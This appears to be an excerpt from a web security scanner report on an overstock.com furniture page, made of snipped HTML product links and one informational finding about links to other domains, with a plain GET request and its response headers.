<img src='http://ak2.ostkcdn.com/images/products/T11671420.jpg' alt="Fairfield 26-inch Swivel Counter Stool" border='0'
height=120
>
</a>
...[SNIP]...
<a class="pro-thumb" href='http://www.overstock.com/Home-Garden/Round-Solid-Wood-End-Table/4790750/product.html' rel='nofollow'>
<img src='http://ak2.ostkcdn.com/images/products/T12689023.jpg' alt="Round Solid Wood End Table" border='0'
height=120
>
</a>
...[SNIP]...
<a class="pro-thumb" href='http://www.overstock.com/Home-Garden/Adjust-A-Coil-Plush-1-inch-Foam-Top-Full-Mattress/3065631/product.html' rel='nofollow'>
<img src='http://ak2.ostkcdn.com/images/products/T11202997.jpg' alt="Adjust-A-Coil Plush 1-inch Foam Top Full Mattress" border='0'
height=120
>
</a>
...[SNIP]...
<a class="pro-thumb" href='http://www.overstock.com/Home-Garden/Antique-Steel-Burnt-Red-Leather-Bench/4321636/product.html' rel='nofollow'>
<img src='http://ak2.ostkcdn.com/images/products/T12297754.jpg' alt="Antique Steel/ Burnt Red Leather Bench" border='0'
height=120
>
</a>
...[SNIP]...
<a class="pro-thumb" href='http://www.overstock.com/Home-Garden/City-Low-profile-Cal-King-size-Bed/1505828/product.html' rel='nofollow'>
<img src='http://ak2.ostkcdn.com/images/products/T1136034.jpg' alt="City Low-profile Cal King-size Bed" border='0'
height=120
>
</a>
...[SNIP]...
<a class="pro-thumb" href='http://www.overstock.com/Home-Garden/Adjust-A-Coil-Pillow-Top-Foam-Full-Mattress/3175053/product.html' rel='nofollow'>
<img src='http://ak2.ostkcdn.com/images/products/T11295199.jpg' alt="Adjust-A-Coil Pillow Top Foam Full Mattress" border='0'
height=120
>
</a>
...[SNIP]...
<a class="pro-thumb" href='http://www.overstock.com/Home-Garden/Phoenix-Futon-Sofa-Bed/4488712/product.html' rel='nofollow'>
<img src='http://ak2.ostkcdn.com/images/products/T12435979a.jpg' alt="Phoenix Futon Sofa Bed" border='0'
height=120
>
</a>
...[SNIP]...
<a class="pro-thumb" href='http://www.overstock.com/Home-Garden/Tara-Tile-Top-Table/5274262/product.html' rel='nofollow'>
<img src='http://ak2.ostkcdn.com/images/products/T13089983.jpg' alt="Tara Tile Top Table" border='0'
height=120
>
</a>
...[SNIP]...
<a class="pro-thumb" href='http://www.overstock.com/Home-Garden/Elements-Round-Weathered-Grey-Accent-Table/5312161/product.html' rel='nofollow'>
<img src='http://ak2.ostkcdn.com/images/products/T13120684.jpg' alt="Elements Round Weathered Grey Accent Table" border='0'
height=120
>
</a>
...[SNIP]...
<a class="pro-thumb" href='http://www.overstock.com/Home-Garden/Francisco-Black-Bonded-Leather-Club-Chair/5321479/product.html' rel='nofollow'>
<img src='http://ak2.ostkcdn.com/images/products/71/648/T13128207.jpg' alt="Francisco Black Bonded Leather Club Chair" border='0'
height=120
>
</a>
...[SNIP]...
<a class="pro-thumb" href='http://www.overstock.com/Home-Garden/Homestyles-Black-Bi-cast-Leather-Storage-Ottoman/4250063/product.html' rel='nofollow'>
<img src='http://ak2.ostkcdn.com/images/products/T12238668.jpg' alt="Homestyles Black Bi-cast Leather Storage Ottoman" border='0'
height=120
>
</a>
...[SNIP]...
<a class="pro-thumb" href='http://www.overstock.com/Home-Garden/Felice-Armless-White-Bonded-Leather-Club-Chair/5036104/product.html' rel='nofollow'>
<img src='http://ak2.ostkcdn.com/images/products/T12914759a.jpg' alt="Felice Armless White Bonded Leather Club Chair" border='0'
height=120
>
</a>
...[SNIP]...
<a class="pro-thumb" href='http://www.overstock.com/Home-Garden/Medium-Brown-Venice-Ottoman/3955186/product.html' rel='nofollow'>
<img src='http://ak2.ostkcdn.com/images/products/T11990499.jpg' alt="Medium Brown Venice Ottoman" border='0'
height=120
>
</a>
...[SNIP]...
<a class="pro-thumb" href='http://www.overstock.com/Home-Garden/Westridge-30-inch-Autumn-Rust-Bar-Stool/5233143/product.html' rel='nofollow'>
<img src='http://ak2.ostkcdn.com/images/products/T13057507.jpg' alt="Westridge 30-inch Autumn Rust Bar Stool" border='0'
height=120
>
</a>
...[SNIP]...
<a class="pro-thumb" href='http://www.overstock.com/Home-Garden/Francisco-Brown-Bonded-Leather-Club-Chair/5321514/product.html' rel='nofollow'>
<img src='http://ak2.ostkcdn.com/images/products/71/648/T13128240.jpg' alt="Francisco Brown Bonded Leather Club Chair" border='0'
height=120
>
</a>
...[SNIP]...
<a class="pro-thumb" href='http://www.overstock.com/Home-Garden/Dark-Mahogany-X-back-Microfiber-Seat-Barstool/3355487/product.html' rel='nofollow'>
<img src='http://ak2.ostkcdn.com/images/products/3/T11445869.jpg' alt="Dark Mahogany X-back Microfiber Seat Barstool" border='0'
height=120
>
</a>
...[SNIP]...
<a class="pro-thumb" href='http://www.overstock.com/Home-Garden/City-Low-profile-5-piece-King-size-Bedroom-Set/4089523/product.html' rel='nofollow'>
<img src='http://ak2.ostkcdn.com/images/products/T12102408.jpg' alt="City Low-profile 5-piece King-size Bedroom Set" border='0'
height=120
>
</a>
...[SNIP]...
<a class="pro-thumb" href='http://www.overstock.com/Worldstock-Fair-Trade/Wooden-Double-Drawer-Demi-Console-Indonesia/5132203/product.html' rel='nofollow'>
<img src='http://ak2.ostkcdn.com/images/products/T12978752.jpg' alt="Wooden Double Drawer Demi Console (Indonesia)" border='0'
height=120
>
</a>
...[SNIP]...
<a class="pro-thumb" href='http://www.overstock.com/Home-Garden/Fan-back-Mahogany-Barstool/3358397/product.html' rel='nofollow'>
<img src='http://ak2.ostkcdn.com/images/products/3/T11448196.jpg' alt="Fan-back Mahogany Barstool" border='0'
height=120
>
</a>
...[SNIP]...
<a class="pro-thumb" href='http://www.overstock.com/Home-Garden/Diamond-Back-Cherry-Side-Chairs-Set-of-2/5088267/product.html' rel='nofollow'>
<img src='http://ak2.ostkcdn.com/images/products/T12944337.jpg' alt="Diamond Back Cherry Side Chairs (Set of 2)" border='0'
height=120
>
</a>
...[SNIP]...
<a class="pro-thumb" href='http://www.overstock.com/Home-Garden/Julian-Barstool/4340378/product.html' rel='nofollow'>
<img src='http://ak2.ostkcdn.com/images/products/T12313553.jpg' alt="Julian Barstool" border='0'
height=120
>
</a>
...[SNIP]...
<a class="pro-thumb" href='http://www.overstock.com/Home-Garden/Black-Hexagon-Butler-Tray-Table/4851742/product.html' rel='nofollow'>
<img src='http://ak2.ostkcdn.com/images/products/T12738463.jpg' alt="Black Hexagon Butler Tray Table" border='0'
height=120
>
</a>
...[SNIP]...
<a class="pro-thumb" href='http://www.overstock.com/Worldstock-Fair-Trade/Handcrafted-Leather-and-Iron-Barstool-Set-of-Two-India/2929298/product.html' rel='nofollow'>
<img src='http://ak2.ostkcdn.com/images/products/T11095786.jpg' alt="Handcrafted Leather and Iron Barstool (Set of Two) (India)" border='0'
height=120
>
</a>
...[SNIP]...
<a class="pro-thumb" href='http://www.overstock.com/Home-Garden/Mondrian-Queen-Leather-Java-Panel-Bed/2549470/product.html' rel='nofollow'>
<img src='http://ak2.ostkcdn.com/images/products/T10775325.jpg' alt="Mondrian Queen Leather Java Panel Bed" border='0'
height=120
>
</a>
...[SNIP]...
<a class="pro-thumb" href='http://www.overstock.com/Home-Garden/Dominique-3-piece-Brown-Faux-Leather-Ottoman-Bench-Set/5283500/product.html' rel='nofollow'>
<img src='http://ak2.ostkcdn.com/images/products/69/641/T13097330.jpg' alt="Dominique 3-piece Brown Faux Leather Ottoman/ Bench Set" border='0'
height=120
>
</a>
...[SNIP]...
<a class="pro-thumb" href='http://www.overstock.com/Home-Garden/Fulton-TV-Entertainment-Center/5016647/product.html' rel='nofollow'>
<img src='http://ak2.ostkcdn.com/images/products/T12897866.jpg' alt="Fulton TV Entertainment Center" border='0'
height=120
>
</a>
...[SNIP]...
<a class="pro-thumb" href='http://www.overstock.com/Home-Garden/Griffin-Moonstone-Ebony-Club-Chair/5118959/product.html' rel='nofollow'>
<img src='http://ak2.ostkcdn.com/images/products/T12968298.jpg' alt="Griffin Moonstone Ebony Club Chair" border='0'
height=120
>
</a>
...[SNIP]...
<a class="pro-thumb" href='http://www.overstock.com/Home-Garden/Bailey-60-inch-Attic-Green-Bookcase/5492824/product.html' rel='nofollow'>
<img src='http://ak2.ostkcdn.com/images/products/T13277707.jpg' alt="Bailey 60-inch Attic Green Bookcase" border='0'
height=120
>
</a>
...[SNIP]...
<a class="pro-thumb" href='http://www.overstock.com/Home-Garden/Grand-Vista-30-inch-Brown-Bar-Stool/5230573/product.html' rel='nofollow'>
<img src='http://ak2.ostkcdn.com/images/products/T13055296.jpg' alt="Grand Vista 30-inch Brown Bar Stool" border='0'
height=120
>
</a>
...[SNIP]...
<a class="pro-thumb" href='http://www.overstock.com/Worldstock-Fair-Trade/Handcrafted-Mongolian-Hardwood-Table-Indonesia/4607420/product.html' rel='nofollow'>
<img src='http://ak2.ostkcdn.com/images/products/T12537715.jpg' alt="Handcrafted Mongolian Hardwood Table (Indonesia)" border='0'
height=120
>
</a>
...[SNIP]...
<a class="pro-thumb" href='http://www.overstock.com/Home-Garden/Francisco-White-Bonded-Leather-Club-Chair/5321480/product.html' rel='nofollow'>
<img src='http://ak2.ostkcdn.com/images/products/71/648/T13128239.jpg' alt="Francisco White Bonded Leather Club Chair" border='0'
height=120
>
</a>
...[SNIP]...
<a class="pro-thumb" href='http://www.overstock.com/Home-Garden/Bellicoso-Transparent-Red-Acrylic-Chrome-Swivel-Wheeled-Chair/5171713/product.html' rel='nofollow'>
<img src='http://ak2.ostkcdn.com/images/products/T13009865.jpg' alt="Bellicoso Transparent Red Acrylic Chrome Swivel Wheeled Chair" border='0'
height=120
>
</a>
...[SNIP]...
<a class="pro-thumb" href='http://www.overstock.com/Home-Garden/Grace-Rustic-TV-Stand-Entertainment-Center/3845396/product.html' rel='nofollow'>
<img src='http://ak2.ostkcdn.com/images/products/T11898727.jpg' alt="Grace Rustic TV Stand/ Entertainment Center" border='0'
height=120
>
</a>
...[SNIP]...
<a class="pro-thumb" href='http://www.overstock.com/Home-Garden/Arkansas-Queen-Bed/5045967/product.html' rel='nofollow'>
<img src='http://ak2.ostkcdn.com/images/products/T12922877a.jpg' alt="Arkansas Queen Bed" border='0'
height=120
>
</a>
...[SNIP]...
<a class="pro-thumb" href='http://www.overstock.com/Home-Garden/Apex-24-inch-Counter-height-Stools-Set-of-2/4871359/product.html' rel='nofollow'>
<img src='http://ak2.ostkcdn.com/images/products/T12754086.jpg' alt="Apex 24-inch Counter-height Stools (Set of 2)" border='0'
height=120
>
</a>
...[SNIP]...
<a class="pro-thumb" href='http://www.overstock.com/Office-Furniture/Mayline-Brighton-Series-72-inch-Rectangular-Cherry-Desk/4450182/product.html' rel='nofollow'>
<img src='http://ak2.ostkcdn.com/images/products/T12403856.jpg' alt="Mayline Brighton Series 72-inch Rectangular Cherry Desk" border='0'
height=120
>
</a>
...[SNIP]...
<a class="pro-thumb" href='http://www.overstock.com/Home-Garden/Rectangle-back-Autumn-Cherry-Chairs-Set-of-2/4891905/product.html' rel='nofollow'>
<img src='http://ak2.ostkcdn.com/images/products/T12785333.jpg' alt="Rectangle-back Autumn Cherry Chairs (Set of 2)" border='0'
height=120
>
</a>
...[SNIP]...
<a class="pro-thumb" href='http://www.overstock.com/Home-Garden/Brown-Solid-Wood-Square-End-Table/4790753/product.html' rel='nofollow'>
<img src='http://ak2.ostkcdn.com/images/products/T12689022.jpg' alt="Brown Solid Wood Square End Table" border='0'
height=120
>
</a>
...[SNIP]...
<a class="pro-thumb" href='http://www.overstock.com/Home-Garden/Coin-Back-Cherry-Chairs-Set-of-2/5088274/product.html' rel='nofollow'>
<img src='http://ak2.ostkcdn.com/images/products/T12944377.jpg' alt="Coin Back Cherry Chairs (Set of 2)" border='0'
height=120
>
</a>
...[SNIP]...
<a class="pro-thumb" href='http://www.overstock.com/Home-Garden/Hudson-Leather-Dining-Chairs-Set-of-2/3134525/product.html' rel='nofollow'>
<img src='http://ak2.ostkcdn.com/images/products/3/T11260633.jpg' alt="Hudson Leather Dining Chairs (Set of 2)" border='0'
height=120
>
</a>
...[SNIP]...
<a class="pro-thumb" href='http://www.overstock.com/Home-Garden/Kirkwood-Swivel-top-TV-Stand/3312230/product.html' rel='nofollow'>
<img src='http://ak2.ostkcdn.com/images/products/T11409257.jpg' alt="Kirkwood Swivel-top TV Stand" border='0'
height=120
>
</a>
...[SNIP]...
<a class="pro-thumb" href='http://www.overstock.com/Home-Garden/Acacia-Dark-Brown-Faux-Leather-Modern-Club-Chair/5258384/product.html' rel='nofollow'>
<img src='http://ak2.ostkcdn.com/images/products/68/28/T13077150.jpg' alt="Acacia Dark Brown Faux Leather Modern Club Chair" border='0'
height=120
>
</a>
...[SNIP]...
<a class="pro-thumb" href='http://www.overstock.com/Home-Garden/TimeSquare-3-piece-Black-Bonded-Leather-Home-Theater-Seating/5042679/product.html' rel='nofollow'>
<img src='http://ak2.ostkcdn.com/images/products/T12920023.jpg' alt="TimeSquare 3-piece Black Bonded Leather Home Theater Seating" border='0'
height=120
>
</a>
...[SNIP]...
<a class="pro-thumb" href='http://www.overstock.com/Home-Garden/Violin-back-Walnut-Counter-Stool/3358418/product.html' rel='nofollow'>
<img src='http://ak2.ostkcdn.com/images/products/3/T11448217.jpg' alt="Violin-back Walnut Counter Stool" border='0'
height=120
>
</a>
...[SNIP]...
<a class="pro-thumb" href='http://www.overstock.com/Home-Garden/Walnut-Epic-Chair-Set-of-2/3650683/product.html' rel='nofollow'>
<img src='http://ak2.ostkcdn.com/images/products/T11715497b.jpg' alt="Walnut Epic Chair (Set of 2)" border='0'
height=120
>
</a>
...[SNIP]...
<a class="pro-thumb" href='http://www.overstock.com/Home-Garden/Dark-Mahogany-Teardrop-Counter-Stool/3358391/product.html' rel='nofollow'>
<img src='http://ak2.ostkcdn.com/images/products/3/T11448194.jpg' alt="Dark Mahogany Teardrop Counter Stool" border='0'
height=120
>
</a>
...[SNIP]...
<a class="pro-thumb" href='http://www.overstock.com/Home-Garden/Leeds-Foggy-Brown-Bonded-Leather-Club-Chair/5166161/product.html' rel='nofollow'>
<img src='http://ak2.ostkcdn.com/images/products/T13005688.jpg' alt="Leeds Foggy Brown Bonded Leather Club Chair" border='0'
height=120
>
</a>
...[SNIP]...
<a class="pro-thumb" href='http://www.overstock.com/Home-Garden/La-Costa-Metal-Black-Counter-Stool/5080008/product.html' rel='nofollow'>
<img src='http://ak2.ostkcdn.com/images/products/T12937944.jpg' alt="La Costa Metal Black Counter Stool" border='0'
height=120
>
</a>
...[SNIP]...
<a class="pro-thumb" href='http://www.overstock.com/Home-Garden/Capri-California-King-Bed-with-Chocolate-Leather/3250949/product.html' rel='nofollow'>
<img src='http://ak2.ostkcdn.com/images/products/T11358978a.jpg' alt="Capri California King Bed with Chocolate Leather" border='0'
height=120
>
</a>
...[SNIP]...
<a class="pro-thumb" href='http://www.overstock.com/Home-Garden/Athena-30-inch-Bar-Stool/4771895/product.html' rel='nofollow'>
<img src='http://ak2.ostkcdn.com/images/products/T12673404.jpg' alt="Athena 30-inch Bar Stool" border='0'
height=120
>
</a>
...[SNIP]...
<a class="pro-thumb" href='http://www.overstock.com/Home-Garden/Athena-26-inch-Mocha-Counter-Stool/5230321/product.html' rel='nofollow'>
<img src='http://ak2.ostkcdn.com/images/products/T13055144.jpg' alt="Athena 26-inch Mocha Counter Stool" border='0'
height=120
>
</a>
...[SNIP]...
<a class="pro-thumb" href='http://www.overstock.com/Home-Garden/Zebra-Chenille-Chair/5197213/product.html' rel='nofollow'>
<img src='http://ak2.ostkcdn.com/images/products/T13029579.jpg' alt="Zebra Chenille Chair" border='0'
height=120
>
</a>
...[SNIP]...
<a class="pro-thumb" href='http://www.overstock.com/Home-Garden/Entertainment-Brown-Leather-Storage-Chair/5211820/product.html' rel='nofollow'>
<img src='http://ak2.ostkcdn.com/images/products/T13040636.jpg' alt="Entertainment Brown Leather Storage Chair" border='0'
height=120
>
</a>
...[SNIP]...
<a class="pro-thumb" href='http://www.overstock.com/Home-Garden/Castleton-70-inch-Mission-Oak-Bookcase/5492846/product.html' rel='nofollow'>
<img src='http://ak2.ostkcdn.com/images/products/T13277690.jpg' alt="Castleton 70-inch Mission Oak Bookcase" border='0'
height=120
>
</a>
...[SNIP]...
<a class="pro-thumb" href='http://www.overstock.com/Worldstock-Fair-Trade/Nickel-plated-Iron-Antique-Butterfly-Tray-Table-India/4817778/product.html' rel='nofollow'>
<img src='http://ak2.ostkcdn.com/images/products/T12711001.jpg' alt="Nickel-plated Iron Antique Butterfly Tray Table (India)" border='0'
height=120
>
</a>
...[SNIP]...
<a class="pro-thumb" href='http://www.overstock.com/Home-Garden/Felice-Black-Bonded-Leather-Armless-Club-Chair/5036107/product.html' rel='nofollow'>
<img src='http://ak2.ostkcdn.com/images/products/T12914764a.jpg' alt="Felice Black Bonded Leather Armless Club Chair" border='0'
height=120
>
</a>
...[SNIP]...
<a class="pro-thumb" href='http://www.overstock.com/Worldstock-Fair-Trade/Wooden-Single-Drawer-Cross-Storage-Indonesia/5132208/product.html' rel='nofollow'>
<img src='http://ak2.ostkcdn.com/images/products/T12978748.jpg' alt="Wooden Single Drawer Cross Storage (Indonesia)" border='0'
height=120
>
</a>
...[SNIP]...
<a class="pro-thumb" href='http://www.overstock.com/Home-Garden/Kayak-Point-30-Inch-Barstool/5079956/product.html' rel='nofollow'>
<img src='http://ak2.ostkcdn.com/images/products/T12937837.jpg' alt="Kayak Point 30-Inch Barstool" border='0'
height=120
>
</a>
...[SNIP]...
<a class="pro-thumb" href='http://www.overstock.com/Home-Garden/Dark-Mahogany-Skillman-Counter-Stool-with-Neutral-Seat/3656707/product.html' rel='nofollow'>
<img src='http://ak2.ostkcdn.com/images/products/T11719912.jpg' alt="Dark Mahogany Skillman Counter Stool with Neutral Seat" border='0'
height=120
>
</a>
...[SNIP]...
<a class="pro-thumb" href='http://www.overstock.com/Home-Garden/Florida-30-inch-Bar-Stools-Set-of-2/4871332/product.html' rel='nofollow'>
<img src='http://ak2.ostkcdn.com/images/products/T12754068.jpg' alt="Florida 30-inch Bar Stools (Set of 2)" border='0'
height=120
>
</a>
...[SNIP]...
<a class="pro-thumb" href='http://www.overstock.com/Home-Garden/Cherry-Epic-Microfiber-Chairs-Set-of-2/3647413/product.html' rel='nofollow'>
<img src='http://ak2.ostkcdn.com/images/products/T11714067.jpg' alt="Cherry Epic Microfiber Chairs (Set of 2)" border='0'
height=120
>
</a>
...[SNIP]...
<a class="pro-thumb" href='http://www.overstock.com/Home-Garden/Tessa-Brown-Bonded-Leather-Quilted-Chair/5043233/product.html' rel='nofollow'>
<img src='http://ak2.ostkcdn.com/images/products/T12920439a.jpg' alt="Tessa Brown Bonded Leather Quilted Chair" border='0'
height=120
>
</a>
...[SNIP]...
<a class="pro-thumb" href='http://www.overstock.com/Home-Garden/Dark-Mahogany-X-back-Microfiber-Seat-Counter-Stool/3355519/product.html' rel='nofollow'>
<img src='http://ak2.ostkcdn.com/images/products/3/T11445884.jpg' alt="Dark Mahogany X-back Microfiber Seat Counter Stool" border='0'
height=120
>
</a>
...[SNIP]...
<a class="pro-thumb" href='http://www.overstock.com/Home-Garden/Harper-Modern-Dark-Brown-Faux-Leather-Recliner/5258385/product.html' rel='nofollow'>
<img src='http://ak2.ostkcdn.com/images/products/68/28/T13077151.jpg' alt="Harper Modern Dark Brown Faux Leather Recliner" border='0'
height=120
>
</a>
...[SNIP]...
<a class="pro-thumb" href='http://www.overstock.com/Home-Garden/McKenzie-Modern-Black-Oval-Rotating-Coffee-Table/5283499/product.html' rel='nofollow'>
<img src='http://ak2.ostkcdn.com/images/products/69/641/T13097329.jpg' alt="McKenzie Modern Black Oval Rotating Coffee Table" border='0'
height=120
>
</a>
...[SNIP]...
<a class="pro-thumb" href='http://www.overstock.com/Home-Garden/Castleton-70-inch-Vintage-Mahogany-Bookcase/5492844/product.html' rel='nofollow'>
<img src='http://ak2.ostkcdn.com/images/products/T13277691.jpg' alt="Castleton 70-inch Vintage Mahogany Bookcase" border='0'
height=120
>
</a>
...[SNIP]...
<a class="pro-thumb" href='http://www.overstock.com/Home-Garden/Laguna-Autumn-Rust-Counter-Stool/3930750/product.html' rel='nofollow'>
<img src='http://ak2.ostkcdn.com/images/products/T11970452.jpg' alt="Laguna Autumn Rust Counter Stool" border='0'
height=120
>
</a>
...[SNIP]...
<a class="pro-thumb" href='http://www.overstock.com/Home-Garden/Arizona-Queen-size-Bed/5045894/product.html' rel='nofollow'>
<img src='http://ak2.ostkcdn.com/images/products/T12922872.jpg' alt="Arizona Queen-size Bed" border='0'
height=120
>
</a>
...[SNIP]...
<a class="pro-thumb" href='http://www.overstock.com/Home-Garden/Faux-Leather-Club-Chair/4334800/product.html' rel='nofollow'>
<img src='http://ak2.ostkcdn.com/images/products/T12308808.jpg' alt="Faux Leather Club Chair" border='0'
height=120
>
</a>
...[SNIP]...
<a class="pro-thumb" href='http://www.overstock.com/Office-Furniture/Mayline-Brighton-Executive-Desk/5283352/product.html' rel='nofollow'>
<img src='http://ak2.ostkcdn.com/images/products/T13097219.jpg' alt="Mayline Brighton Executive Desk" border='0'
height=120
>
</a>
...[SNIP]...
<a class="pro-thumb" href='http://www.overstock.com/Worldstock-Fair-Trade/Handmade-Acacia-Wood-End-Table-Magazine-Rack-Thailand/4293157/product.html' rel='nofollow'>
<img src='http://ak2.ostkcdn.com/images/products/T12272961.jpg' alt="Handmade Acacia Wood End Table Magazine Rack (Thailand)" border='0'
height=120
>
</a>
...[SNIP]...
<a class="pro-thumb" href='http://www.overstock.com/Home-Garden/Rumba-Low-profile-White-Sleigh-Queen-size-Bed/4321550/product.html' rel='nofollow'>
<img src='http://ak2.ostkcdn.com/images/products/T12297705.jpg' alt="Rumba Low-profile White Sleigh Queen-size Bed" border='0'
height=120
>
</a>
...[SNIP]...
<a class="pro-thumb" href='http://www.overstock.com/Home-Garden/Diamond-Back-Walnut-Side-Chairs-Set-of-2/5088272/product.html' rel='nofollow'>
<img src='http://ak2.ostkcdn.com/images/products/T12944338.jpg' alt="Diamond Back Walnut Side Chairs (Set of 2)" border='0'
height=120
>
</a>
...[SNIP]...
<noscript><a href="http://ad.doubleclick.net/jump/lb.overstock/store1/nav;store=1;dept=32;!category=overstock;pos=btf;tile=1;sz=160x600;ord=123456789?"><img src="http://ad.doubleclick.net/ad/lb.overstock/store1/nav;store=1;dept=32;!category=overstock;pos=btf;tile=1;sz=160x600;ord=123456789?" border="0" alt="" /></a>
...[SNIP]...
<a id="productImgLink1" rel="nofollow" href="http://www.overstock.com/Home-Garden/Decor-Swirl-Print-Dining-Chairs-Set-of-2/4401057/product.html" class="pro-thumb">
<img name="proimg1" id="proimg" border="0" height="120" width="120" alt="Decor Swirl Print Dining Chairs (Set of 2)" src="http://ak2.ostkcdn.com/images/products/T12363401a.jpg">
</a>
...[SNIP]...
<a id="productImgLink2" rel="nofollow" href="http://www.overstock.com/Home-Garden/Tovano-Arm-Chair-Creme/3267123/product.html" class="pro-thumb">
<img name="proimg2" id="proimg" border="0" height="120" width="120" alt="Tovano Arm Chair Creme" src="http://ak1.ostkcdn.com/images/products/T11372458.jpg">
</a>
...[SNIP]...
<a id="productImgLink3" rel="nofollow" href="http://www.overstock.com/Home-Garden/Tapered-Chair-Paprika/2663978/product.html" class="pro-thumb">
<img name="proimg3" id="proimg" border="0" height="120" width="120" alt="Tapered Chair Paprika" src="http://ak1.ostkcdn.com/images/products/T10862667.jpg">
</a>
...[SNIP]...
<a id="productImgLink4" rel="nofollow" href="http://www.overstock.com/Home-Garden/Kensington-Leather-Parson-Side-Chairs-Set-of-2/2216228/product.html" class="pro-thumb">
<img name="proimg4" id="proimg" border="0" height="120" width="120" alt="Kensington Leather Parson Side Chairs (Set of 2)" src="http://ak1.ostkcdn.com/images/products/T10480709b.jpg">
</a>
...[SNIP]...
<a id="productImgLink5" rel="nofollow" href="http://www.overstock.com/Home-Garden/Silver-Tabouret-Stacking-Chairs-Set-of-4/5095638/product.html" class="pro-thumb">
<img name="proimg5" id="proimg" border="0" height="120" width="120" alt="Silver Tabouret Stacking Chairs (Set of 4)" src="http://ak1.ostkcdn.com/images/products/T12950045.jpg">
</a>
...[SNIP]...
</script>


<script language="JavaScript" src="http://ak2.ostkcdn.com/js/s_code.js" type='text/javascript'></script>
...[SNIP]...
<li><a href="http://www.facebook.com/Overstockdotcom" target="_blank"><i class="facebook">
...[SNIP]...
<li><a href="http://twitter.com/overstock" target="_blank"><i class="twitter">
...[SNIP]...
<li><a href="http://www.o.biz?TID=FOOT:RS:OBIZ" target="_blank">O.biz</a>
...[SNIP]...
<li><a href="http://www.eziba.com?TID=FOOT:RS:EZIBA" target="_blank">Eziba.com</a>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ak2.ostkcdn.com/js/swfobject.js"></script>
<script type="text/javascript" src="http://ak2.ostkcdn.com/js/lib/os/overstock.1.5.2.min.js"></script>
...[SNIP]...
<!-- PAGE_JS_SEARCH (and NAV) -->
<script type="text/javascript" src="http://ak2.ostkcdn.com/js/search-nav.1.0.0.min.js"></script>
...[SNIP]...

5.11. http://www.overstock.com/Home-Garden/Furniture/Simmons,/brand,/32/dept.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Home-Garden/Furniture/Simmons,/brand,/32/dept.html

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /Home-Garden/Furniture/Simmons,/brand,/32/dept.html?TID=R:MOD_F HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcgotoast=; mxcsurftype=4; mxclastvisit=20110212; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^5731442606501422080|csbtmst^|csbcrt^|csbsfl^|mxcskupage^120|pageresult^120|country^US|currency^USD|language^en; ostk_aggr_session=sessstrt^1297527311612|csbshow^0|mxcshopmore^http://www.overstock.com/; ostk_campaign=; mbox=check#true#1297527454|session#1297527393397-20879#1297529254|PC#1297527393397-20879.17#1298736995; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Repeat%2520Untracked%7C1297529195100%3B; cinfo=ccnt^0:ctmst^1297527311613; se_list=se_list^0|4|;

Response

HTTP/1.1 200 OK
Date: Sat, 12 Feb 2011 16:28:44 GMT
Server: Apache
Expires: Sat, 12 Feb 2011 16:28:44 GMT
Pragma: no-cache
Set-Cookie: mxcsurftype=4; Domain=.overstock.com; Path=/
Set-Cookie: mxclastvisit=20110212; Domain=.overstock.com; Expires=Sun, 12-Feb-2012 16:28:44 GMT; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: ostk_aggr_session="sessstrt^1297527311612|csbshow^0|mxcshopmore^Home-Garden/Furniture/Simmons%2C/brand%2C/32/dept.html|searchhistory^categories,brand"; Domain=.overstock.com; Path=/
Set-Cookie: ostk_campaign=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Keep-Alive: timeout=5, max=89
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Cache-Control: no-cache, no-store
Content-Type: text/html;charset=iso-8859-1
Content-Length: 167183

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml">
<!-- Copyright 2009 Overstock.com --
...[SNIP]...
.org/ratingsv02.html" l gen true for "http://www.overstock.com/" r (cz 1 lz 1 nz 1 oz 1 vz 1) "http://www.rsac.org/ratingsv01.html" l gen true for "http://www.overstock.com/" r (n 0 s 0 v 0 l 0))'>

<link rel="shortcut icon" href="http://ak2.ostkcdn.com/favicon.ico">
<link rel="stylesheet" href="http://ak2.ostkcdn.com/css/os-master.1.2.2.min.css">
<!--[if IE]>
...[SNIP]...
<!-- PAGE_CSS_NAV: site element -->
<link rel="stylesheet" type="text/css" href="http://ak2.ostkcdn.com/css/search-nav.1.3.2.min.css">

<style type="text/css">
...[SNIP]...
<!-- /PAGE_CSS_NAV: site element -->
<script language='javascript' src='http://ak2.ostkcdn.com/js/sales_mtagconfig.js' type='text/javascript'> </script>


<link rel='SHORTCUT ICON' HREF='http://ak2.ostkcdn.com/favicon.ico'>


</head>
...[SNIP]...
<div class="checkOut" >
<img id="checkOutCartIcon" border="0" src="http://ak2.ostkcdn.com/img/mxc/spacer.gif">
<a id="checkoutLink" href="http://www.overstock.com/cart" rel="nofollow">
...[SNIP]...
<a href="http://www.overstock.com/cart" rel="nofollow">
<img id="checkoutButton" border="0" src="http://ak2.ostkcdn.com/img/mxc/spacer.gif" style="margin-left: 10px;">
</a>
...[SNIP]...
<a href="http://www.overstock.com/intlcountryselect"><img src="http://ak2.ostkcdn.com/img/mxc/20101020_us_flag.gif" /></a>
...[SNIP]...
<a title="Window Shopper" href="http://www.overstock.com/window-shopper?c=D-32"><img alt="Window Shopper" src="http://ak2.ostkcdn.com/img/mxc/20101029-window-shopper-furniture.jpg"></a>
...[SNIP]...
<li><a href="http://www.facebook.com/sharer.php?u=[url]&t=[title]" title="Facebook" rel="facebook" target="_blank"><i class="facebook">
...[SNIP]...
<li><a href="http://twitter.com/home?status=[url]%20-%20[title]" title="Twitter" rel="twitter" target="_blank"><i class="twitter">
